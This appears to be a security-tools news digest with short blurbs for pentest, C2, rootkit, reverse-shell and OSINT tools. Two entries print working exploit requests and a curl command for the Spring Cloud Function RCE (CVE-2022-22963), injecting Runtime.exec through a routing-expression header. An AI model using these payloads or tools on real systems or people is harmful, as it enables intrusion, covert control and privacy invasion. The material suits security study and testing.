Slyther : AWS Security Tool
Slyther is an AWS security tool that checks read/write/delete access for S3 buckets.
Requirements: aws-cli
Installation: pip3 install -r requirements.txt
Usage example: python3 slyther.py -b flaws.cloud
Spring-Spel-0Day-Poc : Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression
Spring-Spel-0Day-Poc is an RCE exploit PoC for spring-cloud/spring-cloud-function (https://github.com/spring-cloud/spring-cloud-function). It uses the header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
build
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
get path lists for test
find . -name "*.java"|xargs -I % cat %|grep -Eo '"({8,})"'|sort -u|sed 's/"//g'
…
functionRouter
uppercase
lowercase
…
poc1
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
poc2
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15...
Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simple filtering rules, it's very difficult to precisely target Cloak with...
OffensiveNotion : Notion As A Platform For Offensive Operations
OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent sends data to and receives commands from your Notion page. Your C2 traffic blends right in as the agent receives instructions and posts results via the Notion developer API. And when your blue team looks for evidence of shenanigans,...
CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System
CVE-2022-27254 is a PoC for a vulnerability in Honda's Remote Keyless System (CVE-2022-27254). Summary: This is a proof of concept for CVE-2022-27254, wherein the remote keyless system on various Honda vehicles sends the same, unencrypted RF signal for each door-open, door-close, boot-open and remote start (if applicable). This allows an attacker to eavesdrop on the request and conduct a replay attack. Vehicles Affected • 2016-2020 Honda...
CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
CVE-2022-22963: to run the vulnerable SpringBoot application, run this docker container, exposing it on port 8080. Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
Exploit curl command:
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp Suite.
Casper-Fs : A Custom Hidden Linux Kernel Module Generator
Casper-fs is a custom Linux Kernel Module generator that works with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Not even root has permission to see the files or perform actions on them such as edit and remove. The files...
LAZYPARIAH : A Tool For Generating Reverse Shell Payloads On The Fly
LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly. The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):
C binary payloads (compiled on the fly): c_binary
Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
Powershell payloads: powershell_c, powershell_b64
Base64-encoded Python payloads: python_b64
Rust binary payloads...
Socid-Extractor : Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose
Socid-Extractor extracts information about a user from profile webpages / API responses and saves it in a machine-readable format.
Usage
As a command-line tool:
$ socid_extractor --url https://www.deviantart.com/muse1908
country: France
created_at: 2005-06-16 18:17:41
gender: female
username: Muse1908
website: www.patreon.com/musemercier
links:
tagline: Nothing worth having is easy…
Without installing:
$ ./run.py --url https://www.deviantart.com/muse1908
As a Python library:
import socid_extractor, requests
r = requests.get('https://www.patreon.com/annetlovart')
socid_extractor.extract(r.text)
{'patreon_id': '33913189', 'patreon_username': 'annetlovart', 'fullname': 'Annet Lovart', 'links': ""}
Installation
$ pip3 install socid-extractor
The latest...
Gitcolombo : Extract And Analyze Contributors Info From Git Repos
Gitcolombo is an OSINT tool to extract info about persons from git repositories: common names, emails, and matches between different (as it may seem) accounts.
Usage
Install git
Run:
from any git url
./gitcolombo.py -u https://github.com/Kalanchyovskaia16/newlps
from a directory, recursively
./gitcolombo.py -d ./newlps -r
from all GitHub personal/org repos by nickname
./gitcolombo.py --nickname LubyRuffy
For batch cloning from Gitlab and Bitbucket group repos you can use ghorg.
Output: verbose persons info
name
email
number of appearances...